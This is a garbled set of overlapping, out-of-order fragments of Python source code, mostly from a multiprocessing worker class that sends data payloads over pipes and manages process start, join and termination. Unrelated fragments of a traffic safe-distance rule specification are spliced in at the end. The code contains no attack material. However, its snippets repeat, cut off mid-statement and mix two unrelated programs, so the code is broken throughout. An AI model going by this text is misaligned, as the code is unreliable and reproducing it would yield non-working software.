############### def send_payload(self, payload:", "of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError if", "# # def start(self, num_workers: int, *args, func: Callable = None, **kwargs): #", "Value from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union from", "process and pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target:", "worker process to be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self,", "request status update from worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ###############", "SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages", "except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.'''", "self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new UserFunc to", "user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs): '''Send a", "collections import dataclasses import gc import multiprocessing import os from multiprocessing import Lock,", "args = args if args is not None else tuple() kwargs = kwargs", "if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass", "process id from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of", "print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods ############### def poll(self) -> bool:", "not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload)", "# for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return", "and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ###############", "by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs): '''Send", "otherwise) to worker process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose:", "start each worker # for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs))", "# handle incoming data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload elif", "userfunc = None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process(", "self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid)", "raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return", "verbose=verbose, logging=logging), ) # start worker if requested if start: self.start() def __repr__(self):", "(BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid)", "self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None:", "self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self # # def update_userfunc(self, userfunc:", "if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start()", "worker process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending:", "self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if check_alive and not", "payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if", "join(self): # [w.join() for w in self] # self.clear() # # def terminate(self):", "''' return self.pipe.poll() def execute(self, data: Any): '''Send data to worker and blocking", "self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker", "in self]) # # def start(self, num_workers: int, *args, func: Callable = None,", "func=func, **kwargs)) # # return self # # def update_userfunc(self, userfunc: Callable): #", "it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable = None, start:", "**kwargs): '''Send a new UserFunc to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs))", "self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation ############### # def is_alive(self): #", "incoming data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError):", "gc import multiprocessing import os from multiprocessing import Lock, Pipe, Pool, Process, Value", "check_alive=True): '''Send terminate signal to worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()',", "**kwargs)) # # return self # # def update_userfunc(self, userfunc: Callable): # return", "else tuple() kwargs = kwargs if kwargs is not None else dict() userfunc", "to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def __init__(self, target: Callable = None,", "-> Any: '''Receive raw data from user function.''' return self.recv().data def send_data(self, data:", "to worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class", "Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage,", ") # start worker if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]'", "interface ############### @property def pid(self): '''Get process id from worker.''' return self.proc.pid def", "worker sent anything. ''' return self.pipe.poll() def execute(self, data: Any): '''Send data to", "self.pipe.poll() def execute(self, data: Any): '''Send data to worker and blocking return result", "to worker process to be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def", "self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods ############### def poll(self) ->", "handle incoming data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload,", "isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def", "start(self): '''Start the process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()',", "# set up userfunc if target is not None: args = args if", "userfunc if target is not None: args = args if args is not", "def recv_data(self) -> Any: '''Receive raw data from user function.''' return self.recv().data def", "{payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return", "w in self]) # # def start(self, num_workers: int, *args, func: Callable =", "'''Send any data to worker process to be handled by user function.''' return", "'verbose'] def __init__(self, target: Callable = None, start: bool = False, args=None, kwargs=None,", "# # ############### Worker Creation ############### # def is_alive(self): # return len(self) >", "from .workerprocess import WorkerProcess class WorkerResource: '''Manages a worker process and pipe to", "StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages a", "self.is_alive(): self.start() return self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if", "return self.recv() ############### Pipe interface ############### def send_payload(self, payload: BaseMessage) -> None: '''Send", "Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import", "**kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process,", "**kwargs) else: userfunc = None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc", "False, args=None, kwargs=None, logging: bool = True, verbose: bool = False, method: str", "Dict, Iterable, List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError,", "bool: '''Check if worker sent anything. ''' return self.pipe.poll() def execute(self, data: Any):", "'''Get process id from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status", "method: str = 'forkserver'): '''Open Process and pipe to it. ''' self.verbose =", "process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}')", "WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self,", "os from multiprocessing import Lock, Pipe, Pool, Process, Value from typing import Any,", "def is_alive(self, *arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def start(self):", "ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self #", "WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from", "logging: bool = True, verbose: bool = False, method: str = 'forkserver'): '''Open", "raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get", "'''Open Process and pipe to it. ''' self.verbose = verbose # set up", "userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested if start: self.start() def", "update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for w in self] # # ###############", "a worker process and pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose'] def", "*args, **kwargs) else: userfunc = None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True)", "recv(self) -> DataPayload: '''Return received DataPayload or raise exception. ''' try: payload =", "num_workers: int, *args, func: Callable = None, **kwargs): # if self.is_alive(): # raise", "self.recv().data def send_data(self, data: Any, **kwargs) -> None: '''Send any data to worker", "Message (DataPayload or otherwise) to worker process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()',", "not None else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc = None", "*args, **kwargs): '''Send a new UserFunc to worker process. ''' return self.send_payload(UserFunc(func, *args,", "from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload,", "'''Manages a worker process and pipe to it.''' __slots__ = ['pipe', 'proc', 'verbose']", "# # ############### Low-Level Process Operations ############### # def join(self): # [w.join() for", "return self.proc.is_alive(*arsg, **kwargs) def start(self): '''Start the process, throws WorkerIsAliveError if already alive.'''", "import multiprocessing import os from multiprocessing import Lock, Pipe, Pool, Process, Value from", "Process and pipe to it. ''' self.verbose = verbose # set up userfunc", "def recv(self) -> DataPayload: '''Return received DataPayload or raise exception. ''' try: payload", "and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join()", "List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from", "of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload)", "def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if check_alive and not self.proc.is_alive():", "return self # # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for w", "= Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker", "terminate signal to worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return", "= False, method: str = 'forkserver'): '''Open Process and pipe to it. '''", "upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any: '''Receive raw data", "send_data(self, data: Any, **kwargs) -> None: '''Send any data to worker process to", "= verbose # set up userfunc if target is not None: args =", "self.send_data(data) return self.recv_data() def recv_data(self) -> Any: '''Receive raw data from user function.'''", "'''Send a new UserFunc to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def", "def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!')", "Any, **kwargs) -> None: '''Send any data to worker process to be handled", "it to die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose())", "from multiprocessing import Lock, Pipe, Pool, Process, Value from typing import Any, Callable,", "self # # def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for w in", "ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus):", "running workers.') # # # start each worker # for ind in range(num_workers):", "def send_data(self, data: Any, **kwargs) -> None: '''Send any data to worker process", "raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError:", "Low-Level Process Operations ############### # def join(self): # [w.join() for w in self]", "target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start worker if requested if start: self.start()", "to worker process. ''' if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self}", "WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages a worker process and pipe", "exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main", "result upon reception. ''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any: '''Receive raw", "w in self] # # ############### Low-Level Process Operations ############### # def join(self):", "if kwargs is not None else dict() userfunc = UserFunc(target, *args, **kwargs) else:", "userfunc = UserFunc(target, *args, **kwargs) else: userfunc = None ctx = multiprocessing.get_context(method) self.pipe,", "terminate(self, check_alive=True): '''Send terminate signal to worker.''' if check_alive and not self.proc.is_alive(): raise", "up userfunc if target is not None: args = args if args is", "BaseMessage) -> None: '''Send a Message (DataPayload or otherwise) to worker process. '''", "WorkerIsAliveError('.start()', self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker and then", "payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else:", "return len(self) > 0 and all([w.is_alive() for w in self]) # # def", "None: '''Send any data to worker process to be handled by user function.'''", "WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError,", "raise ValueError('This WorkerPool already has running workers.') # # # start each worker", "else dict() userfunc = UserFunc(target, *args, **kwargs) else: userfunc = None ctx =", "process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status update from", "= None, start: bool = False, args=None, kwargs=None, logging: bool = True, verbose:", ".workerprocess import WorkerProcess class WorkerResource: '''Manages a worker process and pipe to it.'''", "ctx = multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose,", "return self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__", "self.terminate(check_alive=False) ############### Main interface methods ############### def poll(self) -> bool: '''Check if worker", "worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) # start", "exc_tb): self.join() def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface", "None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool already has running workers.')", "elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property", "if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one", "func: Callable, *args, **kwargs): '''Send a new UserFunc to worker process. ''' return", "reception. ''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any: '''Receive raw data from", "if not self.proc.is_alive(): raise WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try: return", "DataPayload: '''Return received DataPayload or raise exception. ''' try: payload = self.pipe.recv() if", "EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if isinstance(payload, DataPayload) or isinstance(payload,", "self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker and then wait for it", "''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status update from worker.", "func: Callable = None, **kwargs): # if self.is_alive(): # raise ValueError('This WorkerPool already", "def poll(self) -> bool: '''Check if worker sent anything. ''' return self.pipe.poll() def", "import Lock, Pipe, Pool, Process, Value from typing import Any, Callable, Dict, Iterable,", "class WorkerResource: '''Manages a worker process and pipe to it.''' __slots__ = ['pipe',", "UserFunc(target, *args, **kwargs) else: userfunc = None ctx = multiprocessing.get_context(method) self.pipe, worker_pipe =", "['pipe', 'proc', 'verbose'] def __init__(self, target: Callable = None, start: bool = False,", "self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self)", "import WorkerProcess class WorkerResource: '''Manages a worker process and pipe to it.''' __slots__", "to be handled by user function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable,", "# self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self # # def update_userfunc(self,", "import dataclasses import gc import multiprocessing import os from multiprocessing import Lock, Pipe,", "start worker if requested if start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self):", "raise exception. ''' try: payload = self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except", "'''Start the process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid)", "verbose # set up userfunc if target is not None: args = args", "was called!') self.terminate(check_alive=False) ############### Main interface methods ############### def poll(self) -> bool: '''Check", "if isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise", "self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation ############### # def", "return [w.update_userfunc(userfunc) for w in self] # # ############### Low-Level Process Operations ###############", "set up userfunc if target is not None: args = args if args", "return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking request status update from worker. '''", "= self.pipe.recv() if self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose:", "# # start each worker # for ind in range(num_workers): # self.append(WorkerResource(ind, *args,", "'''Send a Message (DataPayload or otherwise) to worker process. ''' if not self.proc.is_alive():", "WorkerResource: '''Manages a worker process and pipe to it.''' __slots__ = ['pipe', 'proc',", "Worker and then wait for it to die.''' if check_alive and not self.proc.is_alive():", "Process interface ############### @property def pid(self): '''Get process id from worker.''' return self.proc.pid", "multiprocessing import Lock, Pipe, Pool, Process, Value from typing import Any, Callable, Dict,", "= False, args=None, kwargs=None, logging: bool = True, verbose: bool = False, method:", "start: self.start() def __repr__(self): return f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return", "print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming data if", "'''Send SigClose() to Worker and then wait for it to die.''' if check_alive", "WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self): '''Get process id from worker.'''", "dataclasses import gc import multiprocessing import os from multiprocessing import Lock, Pipe, Pool,", "self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), ) #", "sent anything. ''' return self.pipe.poll() def execute(self, data: Any): '''Send data to worker", "send_payload(self, payload: BaseMessage) -> None: '''Send a Message (DataPayload or otherwise) to worker", "in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) # # return self # #", "isinstance(payload, DataPayload) or isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e", "self.verbose: print(f'{self} received: {payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of", "function.''' return self.send_payload(DataPayload(data, **kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new", "'''Send terminate signal to worker.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid)", "pipe to it. ''' self.verbose = verbose # set up userfunc if target", "import collections import dataclasses import gc import multiprocessing import os from multiprocessing import", "= kwargs if kwargs is not None else dict() userfunc = UserFunc(target, *args,", "worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg,", "return self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation ############### # def is_alive(self):", "WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ############### Worker Creation ############### #", "if target is not None: args = args if args is not None", "payload: BaseMessage) -> None: '''Send a Message (DataPayload or otherwise) to worker process.", "if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) # handle incoming", "def update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new UserFunc to worker process.", "len(self) > 0 and all([w.is_alive() for w in self]) # # def start(self,", "if not self.is_alive(): self.start() return self def __exit__(self, exc_type, exc_value, exc_tb): self.join() def", "new UserFunc to worker process. ''' return self.send_payload(UserFunc(func, *args, **kwargs)) def get_status(self): '''Blocking", "{payload}') except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)')", "**kwargs)) def update_userfunc(self, func: Callable, *args, **kwargs): '''Send a new UserFunc to worker", "each worker # for ind in range(num_workers): # self.append(WorkerResource(ind, *args, func=func, **kwargs)) #", "start: bool = False, args=None, kwargs=None, logging: bool = True, verbose: bool =", "self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate", "Creation ############### # def is_alive(self): # return len(self) > 0 and all([w.is_alive() for", "def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for w in self] # #", "__del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods ############### def", "def join(self): # [w.join() for w in self] # self.clear() # # def", "@property def pid(self): '''Get process id from worker.''' return self.proc.pid def is_alive(self, *arsg,", "Process Operations ############### # def join(self): # [w.join() for w in self] #", "DataPayload or raise exception. ''' try: payload = self.pipe.recv() if self.verbose: print(f'{self} received:", "Any: '''Receive raw data from user function.''' return self.recv().data def send_data(self, data: Any,", "**kwargs) def start(self): '''Start the process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive():", "multiprocessing.get_context(method) self.pipe, worker_pipe = Pipe(duplex=True) self.proc = ctx.Process( target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging), )", "execute(self, data: Any): '''Send data to worker and blocking return result upon reception.", "if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): #", "to die.''' if check_alive and not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except", "#class WorkerPool(list): # # ############### Worker Creation ############### # def is_alive(self): # return", "and then wait for it to die.''' if check_alive and not self.proc.is_alive(): raise", "WorkerPool(list): # # ############### Worker Creation ############### # def is_alive(self): # return len(self)", "for w in self]) # # def start(self, num_workers: int, *args, func: Callable", "a Message (DataPayload or otherwise) to worker process. ''' if not self.proc.is_alive(): raise", "# def update_userfunc(self, userfunc: Callable): # return [w.update_userfunc(userfunc) for w in self] #", "self.proc.pid) return self.proc.start() def join(self, check_alive=True): '''Send SigClose() to Worker and then wait", "WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class WorkerResource: '''Manages a worker process and", "raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or raise exception. '''", "start(self, num_workers: int, *args, func: Callable = None, **kwargs): # if self.is_alive(): #", "except (BrokenPipeError, EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise", "def __del__(self): if self.verbose: print(f'{self}.__del__ was called!') self.terminate(check_alive=False) ############### Main interface methods ###############", "############### # def join(self): # [w.join() for w in self] # self.clear() #", "f'{self.__class__.__name__}[{self.pid}]' def __enter__(self): if not self.is_alive(): self.start() return self def __exit__(self, exc_type, exc_value,", "str = 'forkserver'): '''Open Process and pipe to it. ''' self.verbose = verbose", "############### Worker Creation ############### # def is_alive(self): # return len(self) > 0 and", "WorkerIsDeadError('.send_payload()', self.proc.pid) if self.verbose: print(f'{self} sending: {payload}') try: return self.pipe.send(payload) except BrokenPipeError: raise", "isinstance(payload, WorkerStatus): return payload elif isinstance(payload, WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException):", "WorkerError): #self.terminate(check_alive=True) raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ###############", "anything. ''' return self.pipe.poll() def execute(self, data: Any): '''Send data to worker and", "self.proc.pid def is_alive(self, *arsg, **kwargs): '''Get status of process.''' return self.proc.is_alive(*arsg, **kwargs) def", "None, start: bool = False, args=None, kwargs=None, logging: bool = True, verbose: bool", "not self.proc.is_alive(): raise WorkerIsDeadError('.join()', self.proc.pid) try: self.pipe.send(SigClose()) except BrokenPipeError: pass return self.proc.join() def", "(BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus) from .workerprocess import WorkerProcess class", "def pid(self): '''Get process id from worker.''' return self.proc.pid def is_alive(self, *arsg, **kwargs):", "# ############### Worker Creation ############### # def is_alive(self): # return len(self) > 0", "try: return self.pipe.send(payload) except BrokenPipeError: raise WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received", "Callable, Dict, Iterable, List, NewType, Tuple, Union from .exceptions import (UserFuncRaisedException, WorkerDiedError, WorkerIsAliveError,", "is_alive(self): # return len(self) > 0 and all([w.is_alive() for w in self]) #", "update from worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ############### def send_payload(self,", "'''Receive raw data from user function.''' return self.recv().data def send_data(self, data: Any, **kwargs)", "''' self.verbose = verbose # set up userfunc if target is not None:", "not self.proc.is_alive(): raise WorkerIsDeadError('.terminate()', self.proc.pid) return self.proc.terminate() #class WorkerPool(list): # # ############### Worker", "WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException, WorkerError, WorkerStatus)", "''' self.send_data(data) return self.recv_data() def recv_data(self) -> Any: '''Receive raw data from user", "WorkerDiedError(self.proc.pid) def recv(self) -> DataPayload: '''Return received DataPayload or raise exception. ''' try:", "self] # self.clear() # # def terminate(self): # [w.terminate() for w in self]", "EOFError, ConnectionResetError): if self.verbose: print('caught one of (BrokenPipeError, EOFError, ConnectionResetError)') raise WorkerDiedError(self.proc.pid) #", "WorkerDiedError, WorkerIsAliveError, WorkerIsDeadError, WorkerResourceReceivedUnidentifiedMessage) from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest, UserFunc, UserFuncException,", "status update from worker. ''' self.send_payload(StatusRequest()) return self.recv() ############### Pipe interface ############### def", "the process, throws WorkerIsAliveError if already alive.''' if self.proc.is_alive(): raise WorkerIsAliveError('.start()', self.proc.pid) return", "w in self] # self.clear() # # def terminate(self): # [w.terminate() for w", "Worker Creation ############### # def is_alive(self): # return len(self) > 0 and all([w.is_alive()", "'''Check if worker sent anything. ''' return self.pipe.poll() def execute(self, data: Any): '''Send", "raise payload.e elif isinstance(payload, UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface", "bool = False, method: str = 'forkserver'): '''Open Process and pipe to it.", "UserFuncException): raise UserFuncRaisedException(payload.e) else: raise WorkerResourceReceivedUnidentifiedMessage() ############### Process interface ############### @property def pid(self):", "Any): '''Send data to worker and blocking return result upon reception. ''' self.send_data(data)", "BrokenPipeError: pass return self.proc.join() def terminate(self, check_alive=True): '''Send terminate signal to worker.''' if", "WorkerPool already has running workers.') # # # start each worker # for" ]
[ "the right of way. [...] Nor must a road user who is obliged", "\"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters])", "obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate output signals from", "= {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] =", "only proceed if they can see that they will neither endanger nor substantially", "= f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator is written", "> d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed", "output signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] =", "phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\",", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k,", "opposite directions: <<[...] They may only proceed if they can see that they", "S 